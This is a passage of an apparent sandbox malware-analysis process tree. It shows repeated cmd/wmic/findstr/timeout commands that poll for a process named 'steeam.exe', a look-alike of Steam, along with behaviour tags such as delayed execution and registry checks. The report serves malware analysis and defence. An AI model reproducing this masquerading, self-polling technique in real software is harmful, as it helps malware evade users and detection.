C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5348 -s 300
7⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3388

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2900

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:6056

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5740

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1160

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5320

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4724

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:372

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4804

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4820

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4396

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4464

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2728

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3496

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4200

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5724

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5964

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3508

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6100

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5044

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5604

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5728

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3716

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6096

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:6092

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3608

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4356

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5272

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1068

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1668

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4500

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4448

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5208

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1088

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:6116

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5484

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5748

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3892

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:536

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4576

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1976

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3688

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6004

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2088

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5872

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6104

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5184

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3440

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1864

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5464

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4508

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5836

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5300

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5288

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:964

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3740

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4820

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6088

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2260

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3980

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5632

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2736

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5848

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5508

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3216

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3440

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4732

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5484

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5912

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5072

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3892

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5832

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5204

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5736

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:376

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5768

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3552

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:856

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3156

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4608

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5632

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2856

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5456

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3836

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1088

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5672

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5900

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1152

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3560

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5768

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2760

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3552

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3160

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4356

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5260

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5364

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1992

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:528

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1920

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5548

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5828

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5528

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1240

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1440

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5176

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5300

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5220

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4680

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:856

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6128

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3264

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3300

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5260

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:968

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5412

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2860

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4484

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3800

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3108

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5752

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1688

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3116

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:404

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1284

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5280

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5612

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:6088

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3264

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4672

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5460

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5544

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:936

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4484

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1980

C:\Windows\System32\Wbem\WMIC.exe
